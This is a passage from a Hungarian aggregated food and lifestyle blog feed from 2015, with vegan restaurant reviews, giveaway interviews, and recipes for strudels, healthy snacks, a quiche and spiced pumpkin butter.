és felszolgálókkal dolgoznak. Azonban étlapjuk változatos és ugyanúgy tartalmaz hagyományos magyar ételeket, mint a gyorséttermekre jellemző “street food”-okat. Emellett nem csak 100%-osan vegán a Kozmosz, de külön figyelmet fordítanak a gluténérzékenyekre, valamint azokra a vegán vendégekre, akik herótot kapnak a szójától. Betűkkel jelölik étlapon a glutén és szójamentes ételeket. A Kozmosz vegán étterem első étlapját még első szakácsuk állította össze. Azóta pár apróbb változás történt, de lényegébe fél éve változatlan repertoárral működik az étterem. Vannak leveseik, főételeik, süteményeik és italok. A fix ételek mellett a leveseknél és a desszerteknél hagytak helyet a kreativitásuknak. Mindkét részben van egy szezonális leves és szezonális desszert menü sor, melyet az adott évszak egyik legjellemzőbb zöldsége vagy gyümölcse határoz meg. Az itallapon található italok 100%-a ugyancsak vegán. Azt csak halkan jegyzem meg, hogy a rakott palacsintájuk ízvilága múzsaként hatott rám és hazafelé kitaláltam egy saját vegán rakott palacsinta receptet. Aki náluk eszik, annak ez kötelező választás! Az adagok nem a megszokott “felét ott hagyjuk” méretűek, azonban nem is számítanak kicsinek az én olvasatomban, márpedig nagy étvágyúnak gondolom magam. Bármikor ettem ott, egy leves-főétel, vagy egy főétel-desszert kombóval tökéletesen megteltem. Hogyan látja a Kozmosz vegán étterem magát? “Célunk a vegán életmód és étrend népszerűsítése, elérhetővé tétele. Szeretnénk bebizonyítani, hogy a vegán ételek nemcsak finomak, egészségesek, de változatosak, laktatóak és megfizethetőek is egyszerre. Az ételek elkészítéséhez nem használunk húst, tejterméket, tojást és mézet, kizárólag növényi alapanyagokból dolgozunk.” – áll a Kozmosz vegán étterem honlapján. Olyanoknak ajánlják éttermüket, akik maguk is etikai vegánok, akik egészségügyi megfontolásból lettek vegánok, akik kipróbálnák a vegán ételeket, valamint azoknak, akik mindezektől függetlenül valami finomságra vágynak. Nyitvatartás: Hétfő: Zárva! Keddtől péntekig: 11:30-15:00 és 18:00-22:00 között nyitva. Szombaton és vasárnap: 11:30 és 22:00 között nyitva. A Kozmosz vegán étterem weboldala és facebook oldala.
Levendula csomag nyereményjáték
2015. december 13. Zizi kalandjai
Emesét gyerekkorunk óta ismerem. Egy házban nőttünk fel, egy főiskolára jártunk. Mindig örömmel tölt el, ha látom, hogy a közeli barátaim egy olyan dologba kezdenek bele, ami addig teljesen távol állt tőlük és eredeti szakmájuktól. Emese szalaghímzéssel készített, különböző színű és hangulatú, de mindig levendulaillatot árasztó, kézimunkával készített, egyedi levendulazsákokat kezdett el készíteni. Íme egy mini interjú vele, a bejegyzés végén pedig a játék, amelyen megnyerhettek egy igazán levendulás ajándékcsomagot! Honnan jött az ötlet, hogy levendula zsákokat kezdj el készíteni? Milyen speciális hímzéssel kerülnek a minták a zsákokra? A szalaghímzés ABC-jéről szóló könyvet még anyukám vette meg több, mint 10 éve. Akkoriban épp csak végiglapoztam. Aztán néhány évvel ezelőtt egy szülinapi ajándéknak szerettem volna egyedi “csomagolást” készíteni. Akkor valahogy véletlenül kezembe került ismét a könyv és jött az ötlet, hogy fényes, szatén anyagból zsákot varrok és kidíszítem szalaghímzéssel. Ez még csak a szárnypróbálgatás volt, csak rózsát hímeztem és leveleket, de örültem, mert elsőre sikerült kihímezni a könyv leírása alapján. Egy két ilyen csomagolást még készítettem, különböző méretekben.majd félre raktam a szalaghímzést. Aztán tavaly ősszel jött egy gondolat, hogy mi lenne ha levendulazsákok készülnének, amelyeket szalaghímzéssel díszítenék! Megpróbáltam a rózsán kívül más mintát is hímezni és egész jól sikerültek. Bevásároltam mindenféle színű szatén szalagból, hisz ez a legfontosabb alapanyag! Az ötletek egyre csak gyűltek a fejemben és nem győztem megvalósítani őket, pontosabban kihímezni. Aztán jöttek a csipkék, organza szalag, később a lenvászon. Mikre használhatóak a kis zsákok? A levendula legklasszikusabb felhasználása, hogy a molyűző a szekrényben. Ezek a zsákok természetesen oda is használhatók, de apró ajándéknak is adhatók. A levendula nyugtató hatását kihasználva ágy mellé is rakhatjuk illatozni és mivel különböző színű és stílusú zsákokat készítek, így egyben a szobát is díszítik. Volt olyan is aki autóba illatosítónak vitte! Mennyire tartós az kis zsák illata? Hogyan őrizhetjük meg az illatot minél tovább? Kizárólag eredeti, szárított levendulával töltöm meg a zsákokat, így igen tartós az illatuk, illetve úgy fokozhatjuk, ha kicsit megmorzsoljuk, hiszen akkor intenzívebben érezni. Mivel ezek a zsákok színesek, hangulatosak is egyben, ezért ha egy idő után már a levendula illata nem érvényesül annyira, a díszítő funkcióját még akkor is megtartja. Mindegyik zsákocska egyedi, két, pontosan egyformát általában nem készítek, de stílusukban hasonlót igen. Vannak fényes, szatén zsákok, csipkével díszítettek, lenvászonból készültek, illetve most az ünnepekre arany és ezüst fonallal díszítettek. Készültek már mini változatok is mágnessel ellátva, ezek hűtőmágnesként használhatóak. A legújabb ünnepi kollekció egy kicsit más, ezekben több a levendula és egy hajtogatott szatén szalagrózsa díszíti, nem kell őket felakasztani, megtámasztani, hanem önállóan is mutatósak akár az ünnepi asztalon. Emese elérhető az alábbi linkeken: – Kamélia szalaghímzés Facebook oldal – Kamélia szalaghímzés Meska bolt ***** NYEREMÉNYJÁTÉK! Nyeremény : egy nyertesnek egy nagyon levendulás csomag, amelyben lesz egy levendulás szappan, egy üveg házi készítésű levendulaszörp, egy levendulazsák és egy levendulazsák hűtőmágnes. Írjátok meg a bejegyzés alá kommentben, hogy nektek milyen levendulás termék/étel a kedvencetek (pl. levendulaszappan, levendulás keksz, stb.)! Extra pontért lehet lájkolni a Kamélia szalaghímzés Facebook oldalát! Szabályok : Kérem, hogy az alábbi formula minden pontját töltsétek ki! Vagyis a lefelé mutató nyilakkal nyissátok meg az ablakokat és hajtsátok végre az apró feladatokat. Ha kommentáltatok a blogon, akkor utána a formulába klikkeljetek a szürke I commented! kockára, csak így érvényes a kommentetek. Ha még nem vagy ha már lájkoltátok a Facebook oldalt, mindkét esetben klikk a kék Visit Us-ra a lájk után. A játék 2015. december 13-tól 2015. december 15-ig tart. Sorsolás a Rafflecopter szoftverrel. Eredményhirdetés 2015. december 16-án. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt Emese postázza magyarországi címre. a Rafflecopter giveaway
Banános nutellás minirétesek
A banán és a nutella együtt sokféleképpen megállja a helyét. Tölthetünk vele palacsintát, tehetjük gorfi/waffel-ra, ízesíthetjük vele a tejberizst vagy tejbegrízt. Rétesbe is csavarhatjuk. Ami őszintén szólva meglehetősen finom, akárcsak a fentebb felsorolt édességek. Persze csak arra kell vigyázni, hogy a banán és/vagy a nutella ne fogyjon el, mielőtt elkészítjük a mini réteseket. (Pláne ne együtt fogyjon el (mondjuk banánra kenve a nutellát. :) ) Nagy előnye ennek a finomságnak, hogy gyorsan kész és nem is nehéz elkészíteni. A recept: Hozzávalók: - 1 csomag rétestészta - 3-4 banán - nutella - olaj Elkészítés: A réteslapokat hajtás mentén elvágjuk, nutellát kiskanállal az egyik végére halmozunk, ráteszünk egy banándarabot, a banánon túllógó tésztadarabot felhajtjuk és feltekerjük a banánnal a rétestésztát. Ezt addig csináljuk míg a réteslapok elfogynak. Egymás mellé rakjuk egy tepsibe, és megkenjük a tetejét olajjal. Kb. 15 perc alatt aranybarnára sül. Londonban vastag réteslapot találtam csak elsőre, így minden egyes réteslapot önállóan használtam fel, hajtások mentén hosszú csíkokba daraboltam fel. Magyarországon viszont ilyen réteslappal nem nagyon találkoztam, így ott 3-3 réteslapot először olajjal megkenve, egymásra fektetve, érdemes ezt a műveletet végrehajtani. Kipróbáltam sima mogyorókrémmel is, valamint nutellát felturbóztam darabos mogyorókrémmel. Mindegyik nagyon finom lett. Az emberek nagy részének azonban a nutellás-banános minirétesek ízlettek.
Kókusz Kutya és a Mikulás mesekönyv nyereményjáték
2015. november 30. Zizi kalandjai
Orsit néhány éve ismertem meg, amikor együtt dolgoztunk egy cégnél. Már az első naptól felkarolt, mint kezdő multist… Gyorsan megtaláltuk, hogy mi a közös mindkettőnkben, így jó barátok lettünk. Az útjaink szétváltak, de a barátság megmaradt. Nagyon örültem, amikor elújságolta, hogy írt egy mesekönyvet. Büszke vagyok rá! A lelkesedése, a mese iránti szeretete, a benne élő belső gyermek – aki rajong a cuki dolgokért – példaértékű. Íme egy mini interjú vele, a bejegyzés végén pedig a játék, amelyen megnyerhetitek a könyvét! Ha jól tudom, ez az első könyved… honnan jött az ötlet (inspiráció), hogy tollat ragadj? Júniusban végeztem dráma-és színházpedagógusként a Pannon Egyetemen (eredeti végzettségem: francia-magyar szakos bölcsész). Már korábban is szerettem a meséket, de itt megtanultam, hogy milyen nagy ereje lehet egy mesének a gyerekek életében, milyen sok mindenről lehet beszélgetni és játszani, meg játszva tanulni egy mese kapcsán. Kókusz kutya története már régóta lappangott bennem, és a drámás tanulmányaim ezt valahogy a felszínre hozták. Egy kiskutya, aki szerető gazdit keres. Ez a mese alaptörténete, ami aztán fontos beszélgetéseket indíthat el a gyerekekkel például a barátságról, a segítőkészségről, a felelősségről, de még akár az örökbefogadásról is. Mivel foglalkozol egyébként, ha nem mesekönyvet írsz? Szerencsés vagyok, mert a munkám során is mesékkel illetve gyerekkönyvekkel foglalkozom. Egy gyerekkönyvkiadónál, a Roland Kiadónál dolgozom, és többek között a könyvek irodalmi lektorálását, szerkesztését végzem. Szoktunk játékos meseolvasásokat szervezni a gyerekeknek valamelyik mesekönyvünk kapcsán, és nagyon jó látni, hogyan reagálnak a kicsik a mesékre, hogyan élik bele magukat egy-egy történetbe. Ki Kókusz (kutya)? Kókusz kutya karakterét a mi kiskutyánkról mintáztam, akit szintén Kókusznak hívnak. Mondhatnám azt is, hogy ő adta az ihletet. Ő is kalandos módon került hozzánk, és lett családtag. Bár nem a Mikulás segített neki ebben, vagy ki tudja? Lesz-e folytatás? Nagy örömömre a visszajelzések alapján megkedvelték a gyerekek Kókusz kutyát, és már formálódik is a fejemben kalandjának a folytatása, ami ha minden igaz, Húsvétra már a könyvesboltokba kerülhet. Annyit elárulhatok, hogy Kókusz kutya életébe egy kiscica fog belepottyanni… ***** NYEREMÉNYJÁTÉK!!! Nyeremény : Orsi felajánlása jóvoltából három szerencsés megnyerhet egy-egy dedikált példányt a Kókusz Kutya és a Mikulás című könyvéből. Írjátok meg ide a bejegyzés alá kommentben, hogy nektek gyerekként melyik karácsonyi mese vagy meséskönyv volt a kedvencetek! Szabályok : 2015. december 3-ig lehet játszani. Eredményhirdetés 2015. december 4-én. A nyerteseket emailben fogom értesíteni, majd a nevük kikerül a blogra (ez a bejegyzés fog frissülni). A nyerteseknek a nyereményt Orsi postázza magyarországi címre.
All you can eat vegetarian
Egyél amennyit csak bírsz vegetáriánus módra. Gasztroélmény következik Londonból. Sok gondolat cikázik a fejemben eme apró kis étterem kapcsán. Először is mondjuk ki azt az alapelvet, hogy az egészséges életmódhoz hozzátartozik a mértékletesség is. A NEW START életvitel egyik alapelve. DE úgy is elmehetsz egy all you can eat étterembe, hogy megpróbálsz nem mindent össze-vissza enni. BÁR lehet, hogy nehéz lesz és az óembered legyőzi a jóra törekvő éned. Másodszor pedig nem mehetünk el amellett, hogy Magyarországon még nem találkoztam, nem is hallottam olyan vegetáriánus étteremről, ahol fix árért svédasztalos kínálatból korlátlanul fogyaszthatsz. Mindezért a minimál órabérrel megegyező árat fizeted. Na jó, Magyarország nem olyan jóléti állam, mint UK. Mennyi is az élelmiszer áfája ott? No igen, ez az, ami itt legtöbbször 0. (Bemegyek egy boltba, legyen az Morrisons vagy Lidl, veszek pl. egy kiló barna rizst, fizetek és a blokkot nézegetve azt látom, nincs rajta áfa!!!) Oké, belátom, csak Londonban él több mint egy magyarországnyi ember. S máris nem lehet egészséges párhuzamot vonni a kettő közt. A kormányzásról, fizetésről már ne is beszéljünk... Egyik vasárnap késő délután Chapel Market (Angel Islington) környékén jártunk. Éhesek voltunk, és gondoltuk, elintézzük amit szeretnénk, mielőtt bezárnak az üzletek, s utána keresünk valami evési lehetőséget. Először jártunk arra, nem ismertük a környéket. Egy sportboltba mentünk, s mielőtt beléptünk, észrevettem egy cégcímert, ami vegetáriánus büfét hirdetett. Sportboltból kijövet, sikeresen letudva tervünket, a vegetáriánus büfé felé vettük az irányt. (Alig néhány lépés.) Azt gondoltam, a büfé (buffet) kifejezés amolyan talponálló eszem-iszom lehetőségét rejti magába. S mire ezt kigondoltam, a kirakat előtt álltunk, s láttuk a kiírást: eat as much as you like - egyél amennyit szeretnél. Indiai vegetáriánus étterem. Ezt ki kell próbálni. Bementünk, s jeleztük, szeretnénk itt enni. Kaptunk egy-egy tányért, evőeszközöket, szalvétát. Helyet foglaltunk, s szemeinkkel próbáltuk felfedezni a kicsinyke étterem-féleséget. Az étterem belülről: Semmi elsőosztályú érzése nincs a helynek. Az étterem falai telis-tele vannak poszterekkel, amelyek mintegy propaganda, hirdetik a vegetáriánus és vegán lét előnyeit, ideáját. Ételek felé tettünk néhány lépést. Rántott hagyma, vegyes zöldségek rántva, különféle indiai ízesítésű ragu-félék, rizs, főtt krumpli, különböző saláták, indiai sült kenyér, gyümölcs - ezekből válogathatott az ember. Nem volt hatalmas a kínálat, de jóllakásunkhoz elégséges. Néhány kedvencem: cékla-káposzta saláta, indiai kenyér, borsós kenyérkocka, mangós káposztasaláta, csicseriborsó-ragu, rántott hagyma. Italt vehet az ember, de BYO - hirdeti nagy betükkel: Bring Your Own - hozhatod a saját italod, ott el is fogyaszthatod. Tény, hogy ez nem az a kívül-belül csili-vili étterem, ahova az ember randevúzni megy, de ha éhes, és ezért a pénzért (6,5 font) jól akar lakni és változatosan (vega kaját) enni, akkor elégedett lehet. A svédasztalos kínálat: Persze senki ne gondolja, hogy az otthon megszokott ételeket kapja. Itt Angliában ugyanis a curry dominál. Mintha nem lenne saját ételük, átvették az indiaiak ízvilágát (ezt nem csak itt, az indiai étteremben tapasztaltam). Néha azért elgondolkodom, vajon menyire kedvelnék, ha magyar vegetáriánus (vegán) étterem lenne ez az all you can eat. Mindennapos lehetne a töltött paprika, nem csak főtt rizs és sült krumpli, hanem jó kis főzelékek is lehetnének a köretek, melléjük néhány különböző alapanyagú fasírt és ragu. Szejtánt sem hagynám ki a kínálatból. S a saláták mellett természetesen nem maradna ki a finom magyar desszert. Somlói galuska csakis vegán piskótából. :) További sóvárgásom helyett következzenek a képek a helyről. A képek mellett próbálok még több infót megosztani a látottakról. Vegán-misszió plakátjai: Ha Londonban jársz, és egy büfé-hangulatú, nem éppen igényes helyen korlátlanul szeretnél vegán és vegetáriánus ételeket enni, ne habozz ezt felkeresni: Indian Veg 92-93 Chapel Market, N1 9EX. Angel Islington, London (Angel station metróállomás közelében)
Élő ételek ünnepnapokra
2015. november 25. Gitta nyersétel blogja
Megjelent a legújabb könyvem! Fogadjátok szeretettel! Dedikált példány rendelhető tőlem: gitta@nyersetelakademia.hu A hátlap szöveg: Jó, hogy vannak ünnepeink. Megszakítják a hétköznapok egyhangúságát, ilyenkor megpihenünk kicsit, többet vagyunk szeretteinkkel, és lelkileg is átadjuk magunkat az ünnepi hangulatnak. Látjuk mások örömét, és hagyjuk, hogy nekünk is örömet szerezzenek. Ünnepekre szükség van. Az ételkészítés maga is ünnep, különleges kapcsolati élmény, egyfajta párbeszéd, az örömszerzés egy kifinomult módja. Aki készíti, annak az odaadás és kreativitás, aki elfogyasztja, annak pedig a feltétlen elfogadás élményét nyújtja. Személyre és alkalomra szabottan ételt készíteni: igazi kihívás. A feladat a tervezéssel, bevásárlással kezdődik, majd folytatódik a konyhában, egészen a tálalásig. Gondolatban pedig végig ott szerepel a másik fél: ,,Mivel tudnék neki igazi örömet szerezni? A nyerskonyha színek, formák és ízek olyan hihetetlen sokszínűségét rejti, hogy akár mindennapra juthatna ünnepi fogás az asztalunkra. A természet egy csoda, az alapanyagok tárháza pedig szinte kimeríthetetlen. Lénárt Gitta, a nyers táplálkozás magyarországi szakértője legújabb könyvében bemutatja, hogy a természet kincseiből a tálalással és díszítéssel hogyan tudunk valódi művészi alkotásokat varázsolni az ünnepi asztalra, és hogyan tehetjük különlegessé ezeket az alkalmakat anélkül, hogy kompromisszumot kellene kötnünk az étkezés terén. Különleges, ünnepi receptjeit művészi fotók gazdagítják.
Egészséges ropogtatnivalók...Update perec helyett
2015. november 20. Éltető ételek
Aki már ismer, az tudja, hogy számomra az nevezhető teljes értékű ételnek, amiből nem vettek el semmit, és nem is adtak hozzá semmit. Én ezeket nevezem éltető ételeknek. Mostanában rendszeresen hallani a reklámokban Norbi újabb "finomságát", a perecet, melyet állítólag bűntudat nélkül falatozhatunk. Kíváncsi voltam, hogy vajon mit is tartalmaz: Crips sós kisperec: "Búzaliszt, csökkentett szénhidráttartalmú Update lisztkeverék (zsírtalanított szójaliszt, búzaglutén, búzarost, búzafehérje-koncentrátum, módosított burgonyakeményítő), ivóvíz, finomított pálmazsír, étkezési só 2%, édesítő készítmény (édesítőszerek: maltit, szorbit, eritrit, szukralóz; kukoricadextrin), élesztő, sütőipari készítmény (búzamalátaliszt, emulgeálószerek: E472e, E471; szójaliszt, étkezési só, lisztkezelőszer (aszkorbinsav, enzimek (amilázok)), fényező anyag (nátrium-hidroxid), tejsavópor" Ez az összetétel egyáltalán nem felel meg a teljes értékű táplálkozás elvének. Ezt én inkább mellőzném. De akkor mit ropogtassunk, ha éppen filmet nézünk, vagy csak úgy nasiznánk valami finomat? A gyerekeim is folyamatosan igénylik a nasikat, ropogtatnivalókat. Nálunk nincsenek bolti kekszek, ropik; viszont vannak gyümölcsök, zöldségek, és ezekből készült finomságok. Ha leülnek megnézni egy mesét, akkor almaszeleteket vagy pattogatott kukoricát kapnak, de szeretik a répát és a káposzta torzsát is ropogtatni. És bármennyire hihetetlen, a sóska levelét is szeretik nyersen. A mungóbab csíra is nagy sláger nálunk, a kedvenc "gumicukruk" az aszalt almalap. Még mielőtt megijednétek, hogy "Te jó ég, ezek a Marsról jöttek, hogy ilyeneket esznek?", nos szoktam sütni kekszeket és ropikat is; de most ebben a bejegyzésben direkt az egyszerűbb lehetőségeket vázolom fel. Bár bevallom őszintén, hogy nemcsak a gyerekeim igénylik ezeket a nasikat, hanem én is. Mivel elég sokat dolgozom a számítógép előtt, szeretek közben csipegetni ezt-azt. Hogy ne érjenek durva meglepetések a mérlegen állva, így sokszor magamnak is ezeket készítem, hogy bűntudat nélkül tudjak eszegetni munka közben. Ha nincs sok időm, egyszerűen almát vagy más gyümölcsöt szeletelek fel, de ha időm engedi, akkor jobban elengedem a fantáziámat. Gyümölcsből valami finomat A legegyszerűbb az, ha a gyümölcsöket egyszerűen nyersen felszeleteljük. Én sosem hámozom meg, és a magot/magházat is meg "kell" enni. Ilyenkor, a tél közeledtével sajnos egyre kisebb a választék, de az alma és a körte folyamatosan elérhetőek. Készíthetünk gyümölcsökből chipseket. Ehhez nem feltétlenül kell aszaló, a sütőben is kiszáríthatjuk. Almát gyakran készítek a tél folyamán. Alaposan megmosom az almákat, majd a magházát kiszúrom, és vékonyan (1-2 mm) felszeletelem. Az aszalóban történő aszalásról korábban már írtam egy blogot, így azt itt nem részletezem. A sütőben történő aszalás során az enzimek sérülnek, de gyorsabb szárítást eredményeznek. Amennyiben légkeveréses sütőben szeretnénk elkészíteni, akkor melegítsük elő úgy 110°C-ra. Tegyük az almaszeleteket egy tepsibe, szórjuk meg vaníliaporral és fahéjjal. 40-50 percig szárítsuk úgy, hogy a sütő ajtaja résnyire nyitva legyen. Ezeket az almákat vagy aszalványokat feldobhatjuk úgy is, ha olvasztott csokiba mártjuk őket . Ebbe a csokiba akár pirított mogyorót, mandulát vagy pisztáciát is tehetünk. Készíthetünk diákcsemegét , amelybe kerül édes aszalt gyümölcs és olajos mag vegyesen. Egy kicsit időigényesebb a töltött aszalt gyümölcs . Ekkor minden egyes aszalványba elrejtünk egy olajos magot, majd ezt megforgathatjuk kakaóporban vagy akár kókuszban. (Jó móka a gyerekekkel együtt csinálni, bár ők hamar megunják, így rám marad az összes elkészítése.) Én elég sok meggyet aszaltam, úgyhogy nekünk most ez a sláger. Mint írtam, nálunk a gumicukor az aszalt gyümölcslap . Örök kedvenc az alma, de a meggyre sem mondanak nemet. Amennyiben az aszalás előtt a gyümölcspépbe magokat keverünk (dió, mandula, lenmag), és egy kicsit fűszerezzük ezzel-azzal, finom aszalt diákcsemegénk lesz. A zöldségek is lehetnek kedvencek Elsősorban nyersen ajánlom, hasonlóan a gyümölcsökhöz. A gyerekeim kedvence a sárgarépa és az édeskáposzta, de az uborka is nagy sláger. Amennyiben aszalni szeretnénk, akkor egy kis csavarral finom ropogtatnivalót varázsolhatunk ezekből a zöldségekből. Készítsünk egy ízletes öntetet, amelybe kedvenc fűszereinket beletesszük. Ennek az alapja lehet olajos mag (pl. kesudió, napraforgómag), vagy önmagában olívaolaj. Fűszerezzük magyarosra vagy akár olaszosra, szárítsuk ki és voilá... kész is az egészséges chips "a'la nyers" változatban . Te szereted a kelkáposztát csak úgy rágcsálni? A párom erre azt mondaná, hogy nem vagyok én kecske! Bár nem mintha panaszkodnék, így is mindent megeszik, amit elé rakok. Nos, a kelkáposzta chipsre senki sem fog nemet mondani, még a gyerekek is vígan fogják ropogtatni. De aszalhatunk batátát, répát vagy akár céklát is ezzel a módszerrel. Amennyiben sajtos ízhatást szeretnénk elérni, akkor használjunk sörélesztő pelyhet. Akár nyersen, akár aszalva kínáljuk a zöldségeket, egy kis mártogatós még kiegészítheti ezeket. Olajos magok édesen és sósan Ezek csak mértékkel kerüljenek az asztalunkra, hiszen magas zsírtartalmuk hamar megjelenik a hasunkon is. Napi 1-2 maréknál semmiképp ne fogyasszunk ezekből többet! Az enzimgátlók miatt én minden esetben beáztatom, majd kiszárítom őket. Így sokkal ízletesebbek is. Amennyiben a szárítás előtt finom, fűszeres marinálószószba keverjük, és ezek után szárítjuk ki őket, sokkal finomabbak lesznek. Kipróbálásra érdemes a tökmag paradicsomos-olaszos fűszerezéssel vagy a napraforgómag mexikóiasan. A lehetőségek itt is végtelenek, ízlésünknek megfelelően, kedvünk szerint fűszerezhetünk. De nemcsak sósan, hanem édesen is fűszerezhetünk magokat. Áztassunk be egy kevéske datolyát, majd az áztató vizével turmixoljuk krémesre. Ezt fűszerezzük fahéjjal, vaníliával, és kerülhet bele egy kis narancslé is. Az áztatott magokat (pl. diót, mandulát) keverjük össze ezzel az édes öntettel, majd szárítsuk ki a sütőben vagy az aszalóban. A csírák is finomak ám! Először is együk a csírákat csak úgy, magukban . Télen gyakrabban csíráztatok, talán azért, mert ilyenkor kevesebb a friss gyümölcs, zöldség. Bár meg kell jegyezni, hogy a csíráknak hűtő hatásuk van. Mindenesetre a gyerekeim imádják a mungóbab csírát, de a lucernacsíra is nagyon finom ám. Leggyakrabban viszont hajdinát csíráztatok, és használok fel az ételkészítés során. Finom ropogtatnivaló a mazsolás hajdinacsíra . Elkészítése során a beáztatott mazsolát turmixoljuk, fűszerezzük, majd ebbe a szószba keverjük a hajdinacsírát. Ezek után nincs más dolgunk, mint pár órát állni hagyni ebben az édes szószban, majd kiszárítani sütőben vagy aszalóban. Édes és sós krékerek Ezek elkészítése már időigényesebb, mivel több alapanyagra van szükség. A nagylányom kedvence a répás kréker , de ezt is lehet más-más fűszerezéssel akár olaszosra vagy mexikóira készíteni. A kukoricás változat is kipróbálásra érdemes. Amennyiben édes krékert készítünk, annak alapanyaga valamilyen gyümölcs, aszalvány és olajos mag. Ez alapján készült a zserbó kréker , amely nagy sláger minden ismerősöm körében. A mozizás elengedhetetlen része a pattogatott kukorica . No nem az, amit a plázákban árulnak, és nem is az előrecsomagolt, ízesített kukorica. Én magunknak pattogtatom. 1 evőkanál kókuszolajat vagy vajat egy serpenyőben felhevítek, majd beleteszek 2-3 marék kukoricát. Megsózom - legalább 1 kávéskanál mennyiség kell hozzá -, majd jól összerázom az olajjal. Lefedem, és tűzre teszem. Rendszeresen rázom, hogy ne égjen meg. Amikor már nagyon-nagyon pattognak, leveszem a tűzről, és hagyom teljesen kipattogni. Ez így, önmagában is finom, de csinálhatunk belőle édes finomságot is (ebben az esetben viszont kevésbé sózom meg). Nos, mézzel kis gombócokat formázok, és kakaóporba vagy kókuszreszelékbe forgatom. Ez egyébként még a XIX. században Erdélyben a gyerekek kedvenc csemegéje volt. Még a végén mindenképp megemlítem a kakaóbabot . Bár a gyerekeimnek nem ízlik, nekem annál jobban (legalább több marad nekem). Egy tasak nagyon sokáig elég, naponta 1-2 csipet kielégíti az édesség iránti vágyamat. Nemcsak finom, még remek antioxidáns forrás is. Kell ennél több? Remélem, tudtam ötleteket adni, hogy sütés nélkül is milyen egészséges ropogtatnivalókat tudunk a családunknak kínálni. Sok esetben nem feltétlenül szükséges aszaló, akár sütőben is elkészíthetjük.
Vata lehorgonyzó őszi quiche
2015. november 16. Eszemiszom – Jóga Magazin
Itt van az ősz. itt van újra. Az ősz a mi éghajlatunkon a Vata , vagyis a széles és éteri energiák megnövekedését hozza magával. Kicsit borulékonyabb lehet ilyenkor a kedélyállapotunk, lehet. hogy merevebbek az ízületek és picit beszárad az emésztésünk. A mai recept igazán földel és kellemesen megnyugtatja a felkorbácsolódott Vatánkat. A quiche egy francia étel, leveles tésztából készül és sok tojást használnak hozzá. A tojás remek állati fehérjeforrás, ami ugyanakkor nem olyan nehéz mint a hús. Mondjuk elég savas hatású a szervezet számára, de a sok zöldség hozzáadásával ebben a receptben azért megvan az egyensúly. Ha valaki nagyon nem akar állati eredetű összetevőket használni, akkor a tojást és a joghurtot helyettesítheti tofuval és szójatejjel. Hozzávalók: - lilahagyma - brokkoli - cukkini - kápia paprika vagy pritamin - dió és mogyoró (magyar finom földimogyoró) - 4 tojás - joghurt - leveles tészta Elkészítés: Nyújtsd ki a leveles tésztát és béleld ki vele a tepsit. Külön serpenyőben pirítsd meg a diőt meg a mogyorót, majd tedd félre. Kevés olajon készítsd el a fúszeres alapot: koriandermagot, köményt, őrölt gyömbért, garam masalát. Add hozzá a felkarikázott lilahagymát és a kápiát, sót, kurkumát, majd tedd hozzá a brokkolit és ha egy kicsit már puhul, akkor a kockára vágott cukkinit. Itt a receptnél én megszórtam a cukkinit még egy kis rozmaringgal is. Nem kell őket teljesen készre főzni hisz még a tepsiben is puhulhatnak. Ha félig megfőtt a brokkoli, húzd félre a zöldségeket és verj fel négy tojást egy tálban. Adj hozzá joghurtot, és egy kis vizet. A tésztával kibélelt tepsit szórd meg a megpirított magvakkal, majd terítsd rá a félkész zöldségragut. Az egészet borítsd be a tojásos-joghurtos egyveleggel. Fedd le alufóliával és tedd be az előmelegített sütőbe. Kb. 2o percig süsd, majd szórd meg sajttal a tetejét és hagyd megpirulni. Jó étvágyat!
Fűszeres sütőtök lekvár (vegán)
2015. november 14. Zizi kalandjai
A mai reggelünk és délelőttünk Ádival címszavakban: reggeli; mosogatás; öltözködés; egy adag mosás indítása; néhány foltos konyharuha beáztatása; sütőtök lekvár összekészítése és felrakása a tűzhelyre; porszívózás elkezdése; porszívózás stop egy rövid időre, amíg elkezdtük az ebédet (leveleskelt tisztítottunk, mostunk, majd pároltunk és feltettük a rizst főni); vissza a porszívózáshoz – be is fejeztük; mosás leállt – kiteregetés; közben a lekvár kevergetése folyamatosan; tofu előkészítése pirításhoz; lekvár elkészült – fotózásának előkészítése; közben figyelni a leveleskelre és rizsre; styling és fotózás egy 2.5 évessel; fotózás után elpakolás és mosogatás; rohanás vissza az ebédhez, nehogy odaégjen valami; tofu megpirítása és az ebéd befejezése; tálalás; ebéd; mosogatás; felmosás; majd kidőlés az ágyba és jöhetett a jól megérdemelt ebéd utáni szunyókálás – mindketten el is aludtunk öt percen belül. Játékot nem is vettünk elő, ugyanis az élet volt a játék ma délelőtt, Ádi mindenben segíteni akart nekem és minden folyamatba engedtem is beszállni. I. azt mondta, ez a szuper anyaság, amikor egyszerre ennyi mindent tudok menedzselni és kézben tartani. Ő ennyi mindentől megborulna… Neki maximum két feladatban merül ki mondjuk egy délelőttje Ádival: képes összedobni valami egyszerű ebédet és képes Ádira vigyázni, játszani vele, de mire hazaérek a lakás általában óriási kupiban úszik. De ez így van rendben, apával megy a hatalmas móka, anyával meg a “munka”, ami amúgy tanulás és bizonyos mértékben móka is, mert azért vicces helyzetek egy ilyen mozgalmas, munkával teli délelőtt is történnek. Szóval a sütőtök lekvár… az alaprecept innen származik (de számtalan más recept van a neten), angolul “pumpkin butter”-nek hívják, de ez magyarra fordítva elég furcsán hangzana. Egy keveset változtattam a recepten, almalé helyett házilag babareszelőn reszelt almapüré (ha nincs ilyenetek lehet bolti baba almapürét használni) került bele és a fűszereket is megvariáltam. A végeredmény mennyei lett, a lakásban terjengő illatról nem is beszélve. Délután már ezt ettük Ádival uzsonnára: kenyeret pirítottunk, kentünk rá mandulavajat, majd a tetejére jöhetett a sütőtök lekvár. Nyamm! Szuper lesz vastagabb palacsintákra vagy gofrira kenve, kására kanalazva, ilyen kenyérre kenve vagy csak úgy magában kanalazva is. Hűtőben eláll biztosan egy hétig is, de én nem tartogatnám hónapokig, mivel semmi tartósító nincsen benne. Kiváló ajándék lehet karácsonyra, szóval mentsétek el a receptet és főzésre fel! Az ajándékozott hálás lesz érte nagyon! Fűszeres sütőtök lekvár (vegán) Hozzávalók: – 600-615 g megsült sütőtök “húsa” – 180 g alma (meghámozott, kimagozott mennyiség), pürésre reszelve – 1/2 bögre juharszirup – 1 teáskanál őrölt fahéj – 1/2 teáskanál őrölt szegfűszeg – 1/4 teáskanál őrölt/frissen reszelt szerecsendió – 1/4 teáskanál só – 1/2 citrom kifacsart leve Tegyük az összes hozzávalót egy lábasba és kezdjük el melegíteni. Ha “felforrt”, vegyük takarékra a lángot és főzzük további 30-40 percig, hogy az ízek összeérjenek. 